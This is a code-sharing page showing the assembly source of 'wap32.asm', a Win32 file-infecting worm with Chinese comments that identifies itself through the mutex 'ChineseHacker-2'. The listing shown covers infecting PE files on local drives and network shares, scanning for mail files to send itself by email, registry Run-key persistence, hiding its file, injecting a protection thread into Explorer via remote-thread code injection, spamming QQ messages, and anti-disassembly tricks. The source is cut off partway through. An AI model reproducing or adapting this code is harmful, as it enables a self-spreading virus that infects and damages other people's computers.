📄 wap32.asm
字号:
include wap32.inc
ApiAddressList struc
;Kernel32.DLL
KnlLoadLibraryA dd ?
KnlCreateMutexA dd ?
KnlGetLastError dd ?
KnlGetCommandLineA dd ?
KnlWinExec dd ?
KnlGetDriveTypeA dd ?
KnlSetCurrentDirectoryA dd ?
KnlFindFirstFileA dd ?
KnlFindNextFileA dd ?
KnlFindClose dd ?
KnlSetFileAttributesA dd ?
KnlSetFileTime dd ?
KnlLOpen dd ?
KnlLRead dd ?
KnlLWrite dd ?
KnlLSeek dd ?
KnlLClose dd ?
KnlSleep dd ?
KnlRegisterServiceProc dd ?
KnlGetCurrentProcessId dd ?
KnlOpenProcess dd ?
KnlWriteProcessMemory dd ?
KnlCreateRemoteThread dd ?
KnlCreateKernelThread dd ?
KnlCloseHandle dd ?
KnlWaitForSingleObject dd ?
KnlVirtualAllocEx dd ?
KnlGetSystemDirectoryA dd ?
KnlLCreat dd ?
KnlCreateThread dd ?
KnlTerminateThread dd ?
KnlWideCharToMultiByte dd ?
KnlGetComputerNameA dd ?
KnlGetSystemTime dd ?
;User32.DLL
UserGetWinThreadProcId dd ?
UserFindWindowA dd ?
UserMessageBoxA dd ?
UserGetWindow dd ?
UserSendMessageA dd ?
UserwsprintfA dd ?
;AdvApi32.DLL
AdvRegOpenKeyA dd ?
AdvRegSetValueExA dd ?
AdvRegQueryValueExA dd ?
AdvRegNotifyChange dd ?
;Mpr.DLL
MprWNetOpenEnumA dd ?
MprWNetEnumResourceA dd ?
MprWNetCloseEnum dd ?
;WSock32.DLL
WsWSAStartup dd ?
WsWSACleanup dd ?
Wssend dd ?
Wshtons dd ?
Wsgethostbyname dd ?
Wsconnect dd ?
Wssocket dd ?
Wsclosesocket dd ?
Wsrecv dd ?
;VirusData
DataKnlMzHeader dd ?
DataVirusSize dd ?
DataRemoteThread dd ?
ApiAddressList ends
MAX_BUFF_SIZE=1000h
VirusSize=offset VirusEnd-offset Start+10h
extrn MessageBoxA: proc
extrn ExitProcess: proc
.586p
.model flat,stdcall
.data
Start:
pushad
call VirusEnd
NeedDecode:
mov esi,[esp+4*8]
call PushRunError ;得到意外继续执行地址
popad
PushXXXCode db 68h ;JmpOldApp
OldEntryRVA dd offset Exit
ret
db 0e9h ;静态反汇编干扰
PushRunError:
pop ecx
call SetSehFrame
FindKernel32:
and esi,0fffff000h ;得到Kernel.PELoader代码位置(不精确)
LoopFindKernel32:
sub esi,1000h
cmp word ptr[esi],'ZM' ;搜索EXE文件头
jnz short LoopFindKernel32
GetPeHeader:
movzx edi,word ptr[esi.PEHeaderOffset]
add edi,esi
mov ebp,[edi.fhExportsRVA]
add ebp,esi ;得到输出函数表
mov ebx,[ebp.etExportNameList]
add ebx,esi ;得到输出函数名表
xor eax,eax ;函数序号计数
mov edx,esi ;暂存Kernel32模块句柄
LoopFindApiStr:
add ebx,04
inc eax ;增加函数计数
mov edi,[ebx]
add edi,edx ;得到一个Api函数名字符串
call PushStrGetProcAddress
db 'GetProcAddress',0
PushStrGetProcAddress:
pop esi ;得到Api名字字符串
xor ecx,ecx
mov cl,15 ;GetProcAddress串大小
cld
rep cmpsb
jnz short LoopFindApiStr
mov esi,edx
mov ebx,[ebp.etExportOrdlList]
add ebx,esi ;取函数序号地址列表
movzx ecx,word ptr[ebx+eax*2]
mov ebx,[ebp.etExportAddrList]
add ebx,esi ;得到Kernel32函数地址列表
mov ebx,[ebx+ecx*4]
add ebx,esi ;计算GetProcAddress函数地址
sub esp,size ApiAddressList+10h ;在堆栈中存放API的地址
mov edi,esp
mov [esp.DataKnlMzHeader],esi
call PushKnlApiStr
LoopRelocKnlApi:
mov ebp,ecx
call ebx,esi
cld
stosd
mov ecx,ebp ;定位Kernel32.dll Api
loop LoopRelocKnlApi
mov eax,[esp.KnlLoadLibraryA]
call PushUser32Str
db 'USER32.DLL',0
PushUser32Str:
call eax
mov esi,eax
call PushUser32ApiStr
LoopRelocUser32Api:
mov ebp,ecx
call ebx,esi
cld
stosd
mov ecx,ebp ;定位User32.dll Api
loop LoopRelocUser32Api
mov eax,[esp.KnlLoadLibraryA]
call PushAdvApi32Str
db 'ADVAPI32.DLL',0
PushAdvApi32Str:
call eax
mov esi,eax
call PushAdvApiStr
LoopRelocAdvApi32Api:
mov ebp,ecx
call ebx,esi
cld
stosd
mov ecx,ebp ;定位ADVAPI32.dll Api
loop LoopRelocAdvApi32Api
mov eax,[esp.KnlLoadLibraryA]
call PushMprStr
db 'MPR.DLL',0
PushMprStr:
call eax
mov esi,eax
call PushMprApiStr
LoopRelocMprApi:
mov ebp,ecx
call ebx,esi
cld
stosd
mov ecx,ebp ;定位MPR.dll Api
loop LoopRelocMprApi
mov eax,[esp.KnlLoadLibraryA]
call PushWsStr
db 'WSOCK32.DLL',0
PushWsStr:
call eax
mov esi,eax
call PushWsApiStr
LoopRelocWsApi:
mov ebp,ecx
call ebx,esi
cld
stosd
mov ecx,ebp ;定位MPR.dll Api
loop LoopRelocWsApi
mov esi,esp ;函数调用列表指针,以后固定不变
call PushMutexName
db 'ChineseHacker-2',0
PushMutexName:
call [esi.KnlCreateMutexA],0,0
call [esi.KnlGetLastError]
or eax,eax ;检查病毒是否已经运行
jz short ExecOldProgram
int 3; ;人工引发异常执行原程序,JmpOldApp
db 0e9h ;静态反汇编干扰
ExecOldProgram: ;加载自己,运行老程序
call [esi.KnlGetCommandLineA]
call [esi.KnlWinExec],eax,L 01
call PushNextRunErrorProc;保护注册表与创建远程线程
mov esi,esp ;意外继续执行地址
StartScan:
call PushScanErrorProc;搜索本地与远程目录文件
mov esi,esp ;恢复函数调用列表指针
call [esi.KnlSleep],1000*60;*10
jmp short StartScan ;休眠10分钟重新搜索文件
db 0e9h ;静态反汇编干扰
PushScanErrorProc:
pop ecx
call SetSehFrame
ScanExeFile:
call GetFoundFileCallBackAddr
lea eax,[edx+offset OptExeFile-offset FoundFileCallBackAddr]
mov [edx],eax ;设置找到文件的处理程序
call GetFoundDirCallBackAddr
lea eax,[edx+offset OptLocalDir-offset FoundDirCallBackAddr]
mov [edx],eax ;设置找到目录的处理程序
call EnumLogDrive ;搜索本地文件,并传染病毒
call GetFoundDirCallBackAddr
lea eax,[edx+offset OptNetDir-offset FoundDirCallBackAddr]
mov [edx],eax ;设置找到NET目录的处理程序
call EnumNetResource ;搜索远程文件,并传染病毒
ScanMailFile:
call GetFoundFileCallBackAddr
lea eax,[edx+offset OptMailFile-offset FoundFileCallBackAddr]
mov [edx],eax ;设置找到文件的处理程序
call GetFoundDirCallBackAddr
lea eax,[edx+offset OptLocalDir-offset FoundDirCallBackAddr]
mov [edx],eax ;设置找到目录的处理程序
call EnumLogDrive ;搜索本地文件,发邮件
call GetFoundDirCallBackAddr
lea eax,[edx+offset OptNetDir-offset FoundDirCallBackAddr]
mov [edx],eax ;设置找到NET目录的处理程序
call EnumNetResource ;搜索远程文件,发邮件
CheckRemoteAndWait:
mov eax,[esi.DataRemoteThread]
call [esi.KnlWaitForSingleObject],eax,1000*60;
cmp eax,-1 ;睡眠8小时
jnz short AddWordToQQMsg
NeedCreateRemote:
push esi
call PushWaitErrorProc
pop esi
call GetNetSendMsg
db 'Net Send * My god! Some one killed ChineseHacker-2 Monitor',0
GetNetSendMsg:
pop eax
call [esi.KnlWinExec],eax,0
jmp short CheckRemoteAndWait
PushWaitErrorProc:
pop ecx
call SetSehFrame
call ProcessProtect ;重新启动远程线程保护/内带意外
db 0e9h ;静态反汇编干扰
AddWordToQQMsg:
call GetVirusBaseInRegEdi
GetVirusBaseInRegEdi:
pop edi
mov eax,[esi.UserFindWindowA];填写线程用API
mov [edi+offset FindWindowA9x2k-offset GetVirusBaseInRegEdi],eax
mov eax,[esi.UserGetWindow]
mov [edi+offset GetWindow9x2k-offset GetVirusBaseInRegEdi],eax
mov eax,[esi.UserSendMessageA]
mov [edi+offset SendMessageA9x2k-offset GetVirusBaseInRegEdi],eax
mov eax,[esi.KnlSleep]
mov [edi+offset Sleep9x2k-offset GetVirusBaseInRegEdi],eax
lea eax,[edi+offset SendQQMsg-offset GetVirusBaseInRegEdi]
push eax ;创建QQ附加消息线程
call [esi.KnlCreateThread],0,0,eax,eax,0,esp
mov ebx,eax ;保证SendQQMsg线程活动10分钟
pop eax
CheckRemoteAndWaitAgain:
mov eax,[esi.DataRemoteThread]
call [esi.KnlWaitForSingleObject],eax,1000*60;
push eax ;睡眠10分钟
call [esi.KnlTerminateThread],ebx,0
pop eax
cmp eax,-1
jz short NeedCreateRemoteAgain
int 3; ;人工意外,继续搜索文件
db 0e9h ;静态反汇编干扰
NeedCreateRemoteAgain:
push esi
call PushWaitErrorProcAgain
pop esi
jmp short CheckRemoteAndWaitAgain
PushWaitErrorProcAgain:
pop ecx
call SetSehFrame
call ProcessProtect ;重新启动远程线程保护/内带意外
db 0e9h ;静态反汇编干扰
PushNextRunErrorProc: ;保护注册表与创建远程线程
pop ecx
call SetSehFrame
RegisterProtect:
sub esp,100h ;构造病毒路径
call BuildVirusPathInStack,esp
mov edi,esp
call [esi.KnlLCreat],edi,10h
cmp eax,-1h ;创建独占文件
jz short OptRegister
mov ebx,eax
call UnzipVirusToFile;解压PE文件
call [esi.KnlLSeek],ebx,0,0
call FixPeFile,ebx ;传染病毒给PE文件,不关闭文件,防删除
mov edi,esp ;把病毒设置为:隐藏+系统+只读
call [esi.KnlSetFileAttributesA],edi,7h
OptRegister:
push eax
push esp
call PushRegKeyStr
db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
PushRegKeyStr:
call [esi.AdvRegOpenKeyA],080000002h
pop ebx
mov eax,esp
call PushKeyNameStr ;修改注册表,自动Run项目
db 'Runonce',0
PushKeyNameStr:
pop ecx
call [esi.AdvRegSetValueExA],ebx,ecx,0,1,eax,100h
call GetVirusBaseInEdi
GetVirusBaseInEdi:
pop edi ;得到病毒位置参照偏移量
mov eax,[esi.AdvRegQueryValueExA];填写API地址
mov [edi+offset AdvRegQueryValueExA9x2k-offset GetVirusBaseInEdi],eax
mov eax,[esi.AdvRegSetValueExA]
mov [edi+offset AdvRegSetValueExA9x2k-offset GetVirusBaseInEdi],eax
mov eax,[esi.AdvRegNotifyChange]
mov [edi+offset AdvRegNotifyChangeKeyValue9x2k-offset GetVirusBaseInEdi],eax
lea eax,[edi+offset RegisterProtectProc-offset GetVirusBaseInEdi]
push eax ;创建注册表监视线程
call [esi.KnlCreateThread],0,0,eax,ebx,0,esp
pop eax ;不关闭注册表句柄,监视线程续用
ProcessProtect: ;创建远程线程
xor eax,eax
mov [esi.DataRemoteThread],eax
sub esp,100h
call BuildVirusPathInStack,esp
call GetVirusBaseInEdiAgain
GetVirusBaseInEdiAgain:
pop edi ;得到病毒位置参照偏移量
mov eax,[esi.KnlOpenProcess];填写API地址
mov [edi+offset KnlOpenProcess9x2k-offset GetVirusBaseInEdiAgain],eax
mov eax,[esi.KnlWaitForSingleObject]
mov [edi+offset KnlWaitForSingleObject9x2k-offset GetVirusBaseInEdiAgain],eax
mov eax,[esi.KnlWinExec]
mov [edi+offset KnlWinExec9x2k-offset GetVirusBaseInEdiAgain],eax
mov eax,[esi.KnlRegisterServiceProc]
or eax,eax ;依靠函数RehSvrProc来假定操作系统类别9x/2k
jz short Process2kProtect
Process9xProtect:
call eax,L 0,L 1 ;在Win9x下先隐藏本进程,一级保护
mov edx,[esi.DataKnlMzHeader]
movzx ebx,word ptr[edx.PEHeaderOffset]
add ebx,edx
mov ecx,[ebx.fhObjectTable00.otRVA]
mov ebp,[ebx.fhHeaderSize]
sub ecx,ebp
cmp ecx,200h
jb short Process9xProtectEnd
add ebp,edx ;查询Knl空间
lea edx,[edi+offset ProcessProtectProc-offset GetVirusBaseInEdiAgain]
call MoveDataToKnl,edx,ebp,ProcessProtectProcSize
lea ecx,[ebp+ProcessProtectProcSize]
mov edx,esp ;复制线程代码数据到Kernel32.dll
call MoveDataToKnl,edx,ecx,100h
call [esi.KnlGetCurrentProcessId]
push eax ;创建Kernel线程,未公开函数
call [esi.KnlCreateKernelThread],0,0,ebp,eax,0,esp
mov [esi.DataRemoteThread],eax
pop eax ;启动进程保护线程
call [esi.KnlSleep],500
Process9xProtectEnd:
int 3 ;人工异常
db 0e9h ;反汇编干扰
Process2kProtect: ;填写API地址
call [esi.UserFindWindowA],0,0
push eax ;找Explorer进程/或者Top窗口程序
call [esi.UserGetWinThreadProcId],eax,esp
call [esi.KnlOpenProcess],PROCESS_ALL_ACCESS,0
or eax,eax ;打开该进程
jz short Process2kProtectEnd
mov ebx,eax
call [esi.KnlVirtualAllocEx],ebx,NULL,200h,MEM_COMMIT,L 40h
or eax,eax
jz short Close2kHandle
mov ebp,eax ;分配远程空间
lea edx,[edi+offset ProcessProtectProc-offset GetVirusBaseInEdiAgain]
push eax
call [esi.KnlWriteProcessMemory],ebx,ebp,edx,ProcessProtectProcSize,esp
pop eax ;复制代码到远程地址空间
cmp eax,ProcessProtectProcSize
jnz short Close2kHandle
mov edx,esp
lea ecx,[ebp+ProcessProtectProcSize]
push eax
call [esi.KnlWriteProcessMemory],ebx,ecx,edx,100h,esp
call [esi.KnlGetCurrentProcessId]
call [esi.KnlCreateRemoteThread],ebx,NULL,NULL,ebp,eax,NULL,esp
mov [esi.DataRemoteThread],eax
pop eax ;启动进程保护线程
Close2kHandle:
call [esi.KnlCloseHandle],ebx
call [esi.KnlSleep],500
Process2kProtectEnd:
int 3 ;人工异常
db 0e9h ;反汇编干扰
PushKnlApiStr: ;:ecx=函数名个数
pop eax ;弹出返回地址
mov ecx,esp
call PushKnlApiStr33
db 'GetSystemTime',0
PushKnlApiStr33:
call PushKnlApiStr32
db 'GetComputerNameA',0
PushKnlApiStr32:
call PushKnlApiStr31
db 'WideCharToMultiByte',0
PushKnlApiStr31:
call PushKnlApiStr30
db 'TerminateThread',0
PushKnlApiStr30:
call PushKnlApiStr29
db 'CreateThread',0
PushKnlApiStr29:
call PushKnlApiStr28
db '_lcreat',0
PushKnlApiStr28:
call PushKnlApiStr27
db 'GetSystemDirectoryA',0
PushKnlApiStr27:
call PushKnlApiStr26
db 'VirtualAllocEx',0
PushKnlApiStr26:
call PushKnlApiStr25
db 'WaitForSingleObject',0
PushKnlApiStr25:
call PushKnlApiStr24
db 'CloseHandle',0
PushKnlApiStr24:
call PushKnlApiStr23
db 'CreateKernelThread',0
PushKnlApiStr23:
call PushKnlApiStr22
db 'CreateRemoteThread',0
PushKnlApiStr22:
call PushKnlApiStr21
db 'WriteProcessMemory',0
PushKnlApiStr21:
call PushKnlApiStr20
db 'OpenProcess',0
PushKnlApiStr20:
call PushKnlApiStr19
db 'GetCurrentProcessId',0
PushKnlApiStr19:
call PushKnlApiStr18
db 'RegisterServiceProcess',0
PushKnlApiStr18:
call PushKnlApiStr17
db 'Sleep',0
PushKnlApiStr17:
call PushKnlApiStr16
db '_lclose',0
PushKnlApiStr16:
call PushKnlApiStr15
db '_llseek',0
PushKnlApiStr15:
call PushKnlApiStr14
db '_lwrite',0
PushKnlApiStr14:
call PushKnlApiStr13
db '_lread',0
PushKnlApiStr13:
call PushKnlApiStr12
db '_lopen',0
PushKnlApiStr12:
call PushKnlApiStr11
db 'SetFileTime',0
PushKnlApiStr11:
call PushKnlApiStr10
db 'SetFileAttributesA',0
PushKnlApiStr10:
call PushKnlApiStr09
db 'FindClose',0
PushKnlApiStr09:
call PushKnlApiStr08
db 'FindNextFileA',0
PushKnlApiStr08:
call PushKnlApiStr07
db 'FindFirstFileA',0
PushKnlApiStr07:
call PushKnlApiStr06
db 'SetCurrentDirectoryA',0
PushKnlApiStr06:
call PushKnlApiStr05
db 'GetDriveTypeA',0
PushKnlApiStr05:
call PushKnlApiStr04
db 'WinExec',0
PushKnlApiStr04:
call PushKnlApiStr03
db 'GetCommandLineA',0
PushKnlApiStr03:
call PushKnlApiStr02
db 'GetLastError',0
PushKnlApiStr02:
call PushKnlApiStr01
db 'CreateMutexA',0
PushKnlApiStr01:
call PushKnlApiStr00
db 'LoadLibraryA',0
PushKnlApiStr00:
sub ecx,esp
shr ecx,2
jmp eax
db 0e9h ;静态反汇编干扰
PushUser32ApiStr:
pop eax
mov ecx,esp
call PushUser32ApiStr05
db 'wsprintfA',0
PushUser32ApiStr05:
call PushUser32ApiStr04
db 'SendMessageA',0
PushUser32ApiStr04:
call PushUser32ApiStr03
db 'GetWindow',0
PushUser32ApiStr03:
call PushUser32ApiStr02
db 'MessageBoxA',0
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -